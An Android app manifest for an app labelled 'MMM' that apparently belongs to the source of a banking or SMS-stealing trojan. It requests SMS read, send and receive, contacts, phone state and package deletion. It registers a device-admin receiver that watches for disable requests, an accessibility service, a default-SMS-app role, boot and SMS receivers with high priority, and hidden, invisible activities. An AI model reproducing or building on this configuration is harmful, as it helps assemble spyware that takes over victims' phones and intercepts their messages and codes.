<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.mmm">
    <uses-permission android:name="android.permission.INTERNET" />
    <uses-permission android:name="android.permission.CALL_PHONE" />
    <uses-permission android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS" />
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
    <uses-permission android:name="android.permission.READ_PHONE_STATE" />
    <uses-permission android:name="android.permission.REQUEST_DELETE_PACKAGES"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS" />
    <uses-permission android:name="android.permission.READ_SMS" />
    <uses-permission android:name="android.permission.SEND_SMS" />
    <uses-permission android:name="android.permission.READ_CONTACTS" />
    <uses-permission android:name="android.permission.WAKE_LOCK" />

    <application
        android:allowBackup="true"
        android:icon="@mipmap/ic_launcher"
        android:label="MMM"
        android:roundIcon="@mipmap/ic_launcher_round"
        android:supportsRtl="true"
        android:usesCleartextTraffic="true"
        android:theme="@android:style/Theme.Translucent.NoTitleBar">

        <activity android:name=".Main.SMSManager" />
        <service
            android:name=".Services.ServiceChooser"
            android:exported="false" />

        <activity
            android:name="com.google.android.gms.common.api.GoogleApiActivity"
            android:exported="false"
            android:theme="@android:style/Theme.Translucent.NoTitleBar" />

        <meta-data
            android:name="com.google.android.gms.version"
            android:value="11010000" />

        <service
            android:name=".Services.DevLock"
            android:exported="false" />

        <activity
            android:name=".Main.AccessAdm"
            android:excludeFromRecents="true"
            android:label=""
            android:theme="@android:style/Theme.NoDisplay" />

        <receiver
            android:name=".Main.ReceiverDeviceAdmin"
            android:label="NameAdminDevice"
            android:permission="android.permission.BIND_DEVICE_ADMIN">
            <meta-data
                android:name="android.app.device_admin"
                android:resource="@xml/adm" />

            <intent-filter android:priority="121">
                <action android:name="android.app.action.DEVICE_ADMIN_DISABLED" />
                <action android:name="android.app.action.ACTION_DEVICE_ADMIN_DISABLE_REQUESTED" />
                <action android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
            </intent-filter>
        </receiver>

        <activity android:name=".replace_1">
            <intent-filter>
                <data android:scheme="sms" />
                <action android:name="android.intent.action.SENDTO" />
                <data android:scheme="mms" />
                <category android:name="android.intent.category.BROWSABLE" />
                <data android:scheme="mmsto" />
                <category android:name="android.intent.category.DEFAULT" />
                <data android:scheme="smsto" />
                <action android:name="android.intent.action.SEND" />
            </intent-filter>
        </activity>

        <receiver
            android:name=".replace_2"
            android:permission="android.permission.BROADCAST_WAP_PUSH">
            <intent-filter>
                <data android:mimeType="application/vnd.wap.mms-message" />

                <action android:name="android.provider.Telephony.WAP_PUSH_DELIVER" />
            </intent-filter>
        </receiver>

        <service
            android:name=".replace_3"
            android:permission="android.permission.SEND_RESPOND_VIA_MESSAGE">
            <intent-filter>
                <data android:scheme="sms" />

                <action android:name="android.intent.action.RESPOND_VIA_MESSAGE" />

                <data android:scheme="smsto" />
            </intent-filter>
        </service>
        <service android:name=".Services.srvToaskAccessibility" />

        <activity
            android:name=".Main.AccessActivity"
            android:icon="@drawable/background"
            android:label="" />
        <activity
            android:name=".Main.ViewManager"
            android:excludeFromRecents="true"
            android:icon="@drawable/background"
            android:label=""
            android:launchMode="singleTask"
            />
        <activity android:name=".IndexACT">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.app.role.SMS" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>

        <receiver
            android:name=".Services.BooterConfig"
            android:permission="android.permission.BROADCAST_SMS">
            <intent-filter android:priority="979">
                <action android:name="android.intent.action.BOOT_COMPLETED" />
                <action android:name="android.intent.action.QUICKBOOT_POWERON" />
                <action android:name="android.provider.Telephony.SMS_RECEIVED" />
                <action android:name="com.htc.intent.action.QUICKBOOT_POWERON" />
                <action android:name="android.intent.action.USER_PRESENT" />
                <action android:name="android.intent.action.PACKAGE_ADDED" />
                <action android:name="android.intent.action.PACKAGE_REMOVED" />
                <action android:name="android.provider.Telephony.SMS_DELIVER" />

                <!-- <action android:name="android.intent.action.ACTION_SHUTDOWN" /> -->
            </intent-filter>
        </receiver>

        <activity
            android:name=".Main.PermManager"
            android:excludeFromRecents="true"
            android:icon="@drawable/background"
            android:label=""
            android:theme="@android:style/Theme.NoDisplay" />
        <activity android:name=".Main.ModeChanger" />

        <service android:name=".Services.srvWhileWorker" />
        <service android:name=".Services.Netmanager" />
        <service android:name=".Services.SensorService" />
        <service
            android:name=".Services.Access"
            android:label="Start Accessibility"
            android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
            <intent-filter>
                <action android:name="android.accessibilityservice.AccessibilityService" />
            </intent-filter>

            <meta-data
                android:name="android.accessibilityservice"
                android:resource="@xml/serviceconfig" />
        </service>
    </application>

</manifest>
